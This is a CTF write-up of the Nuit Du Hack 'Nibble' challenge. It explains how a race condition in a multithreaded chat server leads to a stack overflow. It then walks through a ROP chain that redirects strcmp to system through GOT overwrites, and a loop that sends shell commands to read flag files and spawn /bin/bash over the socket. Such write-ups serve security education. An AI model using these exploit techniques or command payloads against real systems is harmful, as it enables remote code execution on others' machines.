The recent Nuit Du Hack CTF Quals CTF was mostly web, crypto and forensics-oriented, with no tasks explicitly categorized as "Exploitation" or "Pwning", my favourite kind. However, a brief investigation has shown that the "Nibble" challenge marked as "Misc" and worth 600 points was indeed an exploitation task, and quite interestingly looking one. I immediately allocated it to myself and started looking into the provided files: a x86 ELF server binary (NibbleServer) and a set of Python client scripts (NibbleClient.tar.gz). By providing the latter, the organizers made it extremely easy to understand the overall logic of the system, which is as follows:
- The client creates a chat_protocol_pb2.AuthPacket protocol buffer object, fills out the only field (string) with user-supplied name and sends it to the server (following a trivial protocol).
- The server replies with a chat_protocol_pb2.TokenResponse protobuf containing a 7-letter pseudo-random authentication token assigned to the username.
- The client can then send a chat_protocol_pb2.ChatMessage structure, containing a cookie (being the previously received token), nickname and the message.
At this point, it was clear we were dealing with a trivial implementation of a chatroom, which could be further confirmed by running the server and clients locally:
Now, the interesting thing about the server is how it is implemented internally: for each connection, the server would create a new thread (using pthread_create), maintain a list of structures describing the entirety of all connections and use them when any of the clients sends a new message:
This is an interesting design decision, as it results in all clients being handled by code running in the same address space, meaning that access to any shared resources (such as global variables) should be properly synchronized.
If we look further into start_routine (the connection handling function) and into the implementation of the authorization code, and spend a few minutes adjusting variable types and names, we should end up with the following representation of the function at 0x8049b29:
Here, you can see that the server deserializes the AuthPacket protocol buffer, assigns a pointer to the provided username to a global variable (username), then if the length of the string is not more than 100, it invokes a cryptic process_username function using the pointer saved in a global variable after a short, artificial delay of 10ms. If we then look into process_username, everything becomes clear:
Because of the multithreaded design of the application and no synchronization protecting access to the global username pointer, we can take advantage of a time-of-check-time-of-use (TOCTOU in short) condition to force a stack-based buffer overflow in the process_username routine by having several threads continuously send packets containing short and long strings, alternately. Once we do this on a local machine, the server should crash in the following manner within a fraction of second:
Running as j00ru
[New Thread 0xf7cbab40 (LWP 11929)]
[New Thread 0xf74b9b40 (LWP 11932)]
[New Thread 0xf6cb8b40 (LWP 11934)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf6cb8b40 (LWP 11934)]
0x41414141 in ?? ()
As the
checksec.sh script informs us, the binary has NX enabled, but RELRO, stack cookies and PIE disabled. This means that we cannot directly execute a shellcode of our choice from e.g. the stack - however, we can easily intercept the control flow, create ROP chains of our choice without any information leaks from the service and freely tamper with the import table of the executable.
In this situation, we would typically ROP our way to system("/bin/sh"); the
system function itself is present in .got.plt, but we didn't have any controlled string in the static memory, and at the time, we didn't notice a pointer to our string (in fact, protocol buffer) stored on the stack, as demonstrated in another public exploit. We could try to create a ROP chain to overwrite one of the .got entries and terminate the local thread through pthread_exit; however, we were not able to find sufficient gadgets in the small binary (this is not to say there aren't). Yet another way would be to overwrite .got by using the recv function to read into the desired memory area from our socket - however, this would require us both to know the socket's file descriptor index (given that there were multiple connections established by a number of CTF participants, it was not easily gueassble) and put binary zeros on the stack, whereas the unsafe sprintf wouldn't allow us to do that.
In this setting, we came up with and decided to use a technique specific to the NibbleServer executable. If we look at the layout of the .got.plt section, we can see the following:
.got.plt:0804B134 __errno_location
.got.plt:0804B138 sprintf
.got.plt:0804B13C srand
.got.plt:0804B140 pthread_exit
.got.plt:0804B144 __gmon_start__
.got.plt:0804B148 realloc
.got.plt:0804B14C recv
.got.plt:0804B150 system
.got.plt:0804B154 listen
.got.plt:0804B158 protobuf_c_message_get_packed_size
.got.plt:0804B15C __libc_start_main
.got.plt:0804B160 htons
.got.plt:0804B164 __assert_fail
.got.plt:0804B168 perror
.got.plt:0804B16C usleep
.got.plt:0804B170 free
.got.plt:0804B174 accept
.got.plt:0804B178 socket
.got.plt:0804B17C strlen
.got.plt:0804B180 protobuf_c_message_free_unpacked
.got.plt:0804B184 strcpy
.got.plt:0804B188 protobuf_c_message_pack_to_buffer
.got.plt:0804B18C bind
.got.plt:0804B190 pthread_detach
.got.plt:0804B194 protobuf_c_message_unpack
.got.plt:0804B198 protobuf_c_message_pack
.got.plt:0804B19C close
.got.plt:0804B1A0 time
.got.plt:0804B1A4 malloc
.got.plt:0804B1A8 pthread_create
.got.plt:0804B1AC send
.got.plt:0804B1B0 puts
.got.plt:0804B1B4 setsockopt
.got.plt:0804B1B8 rand
.got.plt:0804B1BC bzero
.got.plt:0804B1C0 __gxx_personality_v0
.got.plt:0804B1C4 _Unwind_Resume
.got.plt:0804B1C8 strcmp
.got.plt:0804B1CC exit
Out of those, there are two functions which are passed attacker-supplied strings as their first parameters: strlen and strcmp; we would ideally like to overwrite one of them with the address of system. While we don't have a "read from" and "write to" ROP primitives, nor do we have a function like memcpy, we still have strcpy!
Let's consider our options: if we do:
strcpy(&got.strlen, &got.system);
we would instantly trash all .got entries past the address of strlen (everything after 0x804b180), likely crashing the process on the first attempt to use any of the destroyed addresses. Doing:
strcpy(&got.strcmp, &got.system);
sounds like a much better idea: in that case, we only additionally overwrite the address of exit with listen, which is not much a deal given that the process isn't actively terminating at the time of exploitation. However, we are still trashing subsequent .data information following .got.plt. In order to mitigate this and minimize the number of bytes overwritten past the strcmp pointer, we can insert a \0 byte into one of the .got entries after the .got.plt.system item, in order to make the &got.plt.system "string" look shorter to strcpy. It's best that the function we overwrite with a nul byte is never used again, and when we take another look at the GOT layout, we can see that __libc_start_main at 0x804b15c is a perfect candidate: it is only called at the beginning of process execution and is only 8 bytes away from the system entry. The \0 can be injected using strcpy again, with the source parameter set to a zeroed-out memory area, such as 0x804b1d4 (inside of .data):
strcpy(&got.__libc_start_main, 0x804b1d4);
After the two strcpy calls, the memory layout around GOT is as follows:
.got.plt:0804B134 __errno_location
.got.plt:0804B138 sprintf
.got.plt:0804B13C srand
.got.plt:0804B140 pthread_exit
.got.plt:0804B144 __gmon_start__
.got.plt:0804B148 realloc
.got.plt:0804B14C recv
.got.plt:0804B150 system
.got.plt:0804B154 listen
.got.plt:0804B158 protobuf_c_message_get_packed_size
.got.plt:0804B15C \0 ibc_start_main
.got.plt:0804B160 htons
.got.plt:0804B164 __assert_fail
.got.plt:0804B168 perror
.
.
.
.got.plt:0804B1BC bzero
.got.plt:0804B1C0 __gxx_personality_v0
.got.plt:0804B1C4 _Unwind_Resume
.got.plt:0804B1C8 system
.got.plt:0804B1CC listen
.data:0804B1D0 protobuf_c_message_get_packed_size
Since we're against a race condition, we don't know exactly when we hit the right timing and .got becomes overwritten - therefore, we would like to keep the process alive at all times by preventing any kind of unnecessary exceptions. To make this happen, we terminate the current thread cleanly via pthread_terminate. The overall ROP chain formed in Python looks as follows:
padding_addr = 0x8049d42
def rop_strcpy(dst, src):
strcpy_jmp = 0x8048ca0
return (struct.pack('I', strcpy_jmp) +
struct.pack('I', padding_addr) +
struct.pack('I', dst) +
struct.pack('I', src) +
"A" * 0x24)
def rop_pthread_exit(exitcode):
pthread_exit_jmp = 0x8048b90
return (struct.pack('I', pthread_exit_jmp) +
struct.pack('I', padding_addr) +
struct.pack('I', exitcode))
def rop():
nul_data_address = 0x804b1d4
libc_start_main_got = 0x804b15c
system_got = 0x804b150
strcmp_got = 0x804b1c8
pthread_exit_got = 0x8048b90
return (rop_strcpy(libc_start_main_got, nul_data_address) +
rop_strcpy(strcmp_got, system_got) +
rop_pthread_exit(0xdeadbeef))
However, if we try to use the above payload in our exploit using the original chat_protocol_pb2.py protocol buffer implementation provided by the organizers, we will encounter the following error:
It turns out that the username field in the AuthPacket message was defined as type "string", which only accepts correctly encoded textual strings. In order to work around this, we have to rewrite the protocol buffer definitions on our own, changing the field's type from "string" to "bytes":
package NibblesChat;
message AuthPacket {
required bytes username = 1;
}
message ChatMessage {
required string cookie = 1;
required string nickname = 2;
required string textmessage = 3;
}
and compile it locally to create a new chat_protocol_pb2.py file:
$ protoc chat_protocol.proto --python_out=.
With this sorted out, our exploit can now successfully overwrite strcmp with system:
(gdb) x/1wx 0x804b150
0x804b150 <system@got.plt>: 0xf7fb7e10
(gdb) x/1wx 0x804b1c8
0x804b1c8 <strcmp@got.plt>: 0xf7fb7e10
(gdb) x/1i 0xf7fb7e10
0xf7fb7e10 <system>: push %ebx
Hurray! We now have the ability to execute arbitrary commands on the remote server via the ChatMessage packet, which contains a string passed directly as the first parameter to the overwritten strcmp. However, all attempts to spawn a reverse shell via netcat and other traditional methods failed. Normally, we would invoke a "/bin/sh <&4 >&4" command to have the shell's standard input and output redirected to our socket at a known fd; however in this case, we don't know the exact numeric value of the socket. Luckily, the strcmp standard function is called using the __cdecl convention, meaning that a mismatch in the number of parameters between strcmp and system does not misalign the stack and crash the application. Therefore, we have an unlimited number of attempts to guess the fd, which we achieved using the following code:
for i in range(1, 100):
# Send message.
msg = chat_protocol_pb2.ChatMessage()
msg.cookie = "echo test >&%u; cat fla* ke* ~/fla* ~/ke* >&%u; /bin/bash <&%u >&%u" % (i, i, i, i)
msg.nickname = "j00ru//drgns"
msg.textmessage = "pwned.";
data = "2" + msg.SerializeToString()
s.send(struct.pack('<I', len(data)) + data)
While we had the exploit ready after not too long since we started working at the task, the service was overloaded at the time of the CTF, with multiple teams attempting to solve it and crashing the process before anyone could grab the flag (hell, my exploit probably contributed to the situation a lot). After two tedious hours, our console would finally spit out the flag and provide us with remote shell access to the vulnerable box: